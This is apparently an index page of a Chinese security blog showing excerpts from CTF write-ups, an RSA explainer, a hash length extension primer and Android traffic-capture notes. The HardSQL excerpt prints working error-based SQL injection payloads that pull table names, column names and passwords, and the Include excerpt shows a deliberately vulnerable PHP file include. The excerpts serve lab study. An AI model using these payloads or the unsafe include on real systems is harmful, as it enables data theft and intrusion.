PHP 本地文件包含(LFI)漏洞学习笔记
百道CTF刷题记录(四)之BUUCTF

百道CTF刷题记录(四)之BUUCTF

前言

接上篇,继续刷题

正文

[极客大挑战 2019]HardSQL

考点:报错注入。过滤了空白字符、=

EXP:

1
2
3
4
5
6
7
8
9
10
# 取表名
check.php?username=1&password=1%27^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp(database())),0x7e),1)%23

# 取列名
check.php?username=1&password=1%27^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_schema)regexp(database())),0x7e),1)%23

# 读数据
check.php?username=1&password=1%27^updatexml(1,concat(0x7e,(select(group_concat(id,password,username))from(H4rDsq1)),0x7e),1)%23

# 读取不全使用right()取右边部分内容
阅读更多
2020重庆市教育系统网络安全攻防竞赛决赛 - Web Writeup
对RSA加密原理及其应用的简单研究

对RSA加密原理及其应用的简单研究

前言

又是打CTF遇到的考点,也不是啥新鲜玩意了,这东西属于密码学的范畴,不过却是学信安的同学必须掌握的内容。今天就来打算好好学学这RSA究竟是个怎样的东西,让CTF考了这么多遍至今仍是一道频率极高的考点。

正文

我们都知道,对于数字届来说,质数无遗是一种十分特殊的存在。他不会被除了1和他自身之外的正整数给整除,即他的因子只有1和他自己。而以目前的计算机算力来说,对于一个由两个1024位长的质数相乘得到的整数,想要反求他是由哪两个质数相乘而来实在困难重重。根据这一特性,RSA加密算法应运而生。

数学基础

想要弄清楚RSA加密原理,就不得不提到一位数学家——欧拉。

阅读更多
浅谈HASH长度拓展攻击

浅谈HASH长度拓展攻击

前言

最近在做CTF题的时候遇到这个考点,想起来自己之前在做实验吧的入门CTF题的时候遇到过这个点,当时觉得难如看天书一般,现在回头望去,仔细琢磨一番感觉也不是那么难,这里就写篇文章记录一下自己的学习的过程。

正文

何为HASH长度拓展攻击?

简单的说,由于HASH的生成机制原因,使得我们可以人为的在原先明文数据的基础上添加新的拓展字符,使得原本的加密链变长,进而控制加密链的最后一节,使得我们得以控制最终结果。

这里我们以MD5加密算法为例子。

阅读更多
CISCN 2020 Web WriteUp

CISCN 2020 Web WriteUp

前言

今天刚打了CISCN2020,简单的WEB题都没有AK… 太菜了

题解

easyphp

通过题目描述猜测本题的考点应该是要让子线程非正常退出,执行phpinfo()得到flag。

阅读更多
百道CTF刷题记录(三)之BUUCTF

百道CTF刷题记录(三)之BUUCTF

前言

接上篇,继续刷题。

刷题之旅

[ACTF2020 新生赛]Include

打开题目,可以看到有个tips的跳转链接,点击后跳转到:

1
/?file=flag.php

结合题目猜测源码为:

1
2
3
<?php
include $_GET['file'];
?>
阅读更多
用易语言简单编写一款半自动URL采集工具

用易语言简单编写一款半自动URL采集工具

前言

前段时间需要通过搜索引擎采集一些目标站,找了以前自己收集的一些工具,发现大多都失效了,没失效的也不怎么好用,思考了一下,还是决定自己来弄一个,这里借鉴的是法克论坛URL采集工具,这款工具在我电脑上失效了,感谢前辈们的工具。

正文

准备

  • 易语言
  • 精益模块
  • 精益web浏览器支持库
  • 精益web浏览器填表模块
阅读更多
百道CTF刷题记录(二)之BUUCTF

百道CTF刷题记录(二)之BUUCTF

前言

最近好久没刷CTF题了,其实BUUCTF这个平台我也是最开始的用户之一(uid前20,懒狗石锤了…),可是一直没有时间能够好好的刷题,今儿总算时间充裕,打算花些时日,记录下自己在BUU刷题的经验。

刷题之旅

[HCTF 2018]WarmUp

打开题目页面,习惯性右键查看HTML源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->

<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
阅读更多
Android 7.0以上使用VirtualXposed和Charles进行抓包

Android 7.0以上使用VirtualXposed和Charles进行抓包

前言

最近在对一个app进行测试的时候,尝试抓取数据包,发现以前的使用方法失效了,原因是随着安卓版本的提高,对证书的限制越发严格,而我身边的老机子放在学,不在身边,没得办法,只好研究一下怎么绕过这种限制。

经过一方查找,终于发现了一个相对比较简单的办法,这里就开一篇文章,记录一下。

过程

首先下载所需要的工具:

阅读更多